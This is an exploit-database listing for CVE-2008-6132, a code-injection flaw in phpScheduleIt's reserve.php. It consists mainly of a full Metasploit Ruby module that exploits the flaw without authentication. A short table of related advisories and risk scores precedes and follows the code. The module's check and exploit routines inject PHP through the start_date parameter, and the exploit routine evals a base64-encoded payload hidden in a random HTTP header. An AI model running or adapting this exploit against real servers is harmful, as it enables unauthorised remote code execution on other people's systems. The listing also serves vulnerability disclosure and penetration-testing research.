phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Injection

🗓️ 25 Oct 2011 00:00:00Reported by metasploitType

zdt🔗 0day.today👁 23 Views

phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Injection. Executes arbitrary PHP code

Reporter	Title	Published	Views	Family All 13
Circl	CVE-2008-6132	1 Oct 200800:00	–	circl
CVE	CVE-2008-6132	13 Feb 200918:00	–	cve
Cvelist	CVE-2008-6132	13 Feb 200918:00	–	cvelist
Exploit DB	phpScheduleIt 1.2.10 - 'reserve.php' Arbitrary Code Injection (Metasploit)	26 Oct 201100:00	–	exploitdb
Metasploit	phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection	26 Oct 201118:06	–	metasploit
NVD	CVE-2008-6132	13 Feb 200918:30	–	nvd
OpenVAS	phpScheduleIt 'reserve.php' Remote Code Execution Vulnerability	20 Jul 200900:00	–	openvas
OpenVAS	phpScheduleIt 'reserve.php' RCE Vulnerability	20 Jul 200900:00	–	openvas
Packet Storm	phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection	27 Oct 201100:00	–	packetstorm
Tenable Nessus	phpScheduleIt reserve.php start_date Parameter Arbitrary Command Injection	3 Oct 200800:00	–	nessus

##
# $Id: phpscheduleit_start_date.rb 14073 2011-10-26 18:06:12Z sinn3r $
##
 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking
 
    include Msf::Exploit::Remote::HttpClient
 
    def initialize(info = {})
        super(update_info(info,
            'Name' => 'phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection',
            'Description'    => %q{
                    This module exploits an arbitrary PHP code execution flaw in the phpScheduleIt
                software. This vulnerability is only exploitable when the magic_quotes_gpc PHP
                option is 'off'. Authentication is not required to exploit the bug.
 
                Version 1.2.10 and earlier of phpScheduleIt are affected.
            },
            'Author'         =>
                [
                    'EgiX',        # Vulnerability Discovery and Exploit
                    'juan vazquez' # Metasploit module
                ],
            'License'        => BSD_LICENSE,
            'Version'        => '$Revision: 14073 $',
            'References'     =>
                [
                    ['CVE', '2008-6132'],
                    ['OSVDB', '48797'],
                    ['BID', '31520'],
                    ['URL', 'http://www.exploit-db.com/exploits/6646/'],
                ],
            'Privileged'     => false,
            'Platform'       => ['php'],
            'Arch'           => ARCH_PHP,
            'Payload'        =>
                {
                    # max header length for Apache,
                    # http://httpd.apache.org/docs/2.2/mod/core.html#limitrequestfieldsize
                    'Space'       => 8190,
                    'DisableNops' => true,
                    'Keys'        => ['php'],
                },
            'Targets'        => [ ['Automatic', { }] ],
            'DefaultTarget' => 0,
            'DisclosureDate' => 'Oct 1 2008'))
 
        register_options(
            [
                OptString.new('URI', [ true,  "The full URI path to phpScheduleIt", '/phpscheduleit']),
            ], self.class)
    end
 
    def check
        signature = rand_text_alpha(rand(10)+10)
        stub = "1').${print('#{signature}')}.${die};#"
        my_payload = "btnSubmit=1&start_date=#{stub}"
 
        if datastore['URI'][-1, 1] == "/"
            uri = datastore['URI'] + "reserve.php"
        else
            uri = datastore['URI'] + "/reserve.php"
        end
 
        print_status("Checking uri #{uri}")
 
        response = send_request_cgi({
            'method' => "POST",
            'global' => true,
            'uri' => uri,
            'headers' => {
                    'Referer' => uri,
                },
            'data' => "#{my_payload}"
        })
 
        if response.code == 200 and response.body =~ /#{signature}/
            return Exploit::CheckCode::Vulnerable
        end
 
        return Exploit::CheckCode::Safe
    end
 
    def exploit
        headername = "X-" + Rex::Text.rand_text_alpha_upper(rand(10)+10)
        stub = "1').${error_reporting(0)}.${eval(base64_decode($_SERVER[HTTP_#{headername.gsub("-", "_")}]))};#"
        my_payload = "btnSubmit=1&start_date=#{stub}"
 
        if datastore['URI'][-1, 1] == "/"
            uri = datastore['URI'] + "reserve.php"
        else
            uri = datastore['URI'] + "/reserve.php"
        end
 
        print_status("Sending request for: #{uri}")
        print_status("Payload embedded in header: #{headername}")
 
        response = send_request_cgi({
            'method' => "POST",
            'global' => true,
            'uri' => uri,
            'headers' => {
                    headername  => Rex::Text.encode_base64(payload.encoded),
                    'Referer'   => uri
                },
            'data' => "#{my_payload}"
        }, 3)
 
        if response and response.code != 200
            print_error("Server returned a non-200 status code: (#{response.code})")
        end
 
        handler
    end
end



#  0day.today [2018-04-13]  #

25 Oct 2011 00:00Current

7.1High risk

Vulners AI Score7.1

EPSS0.77215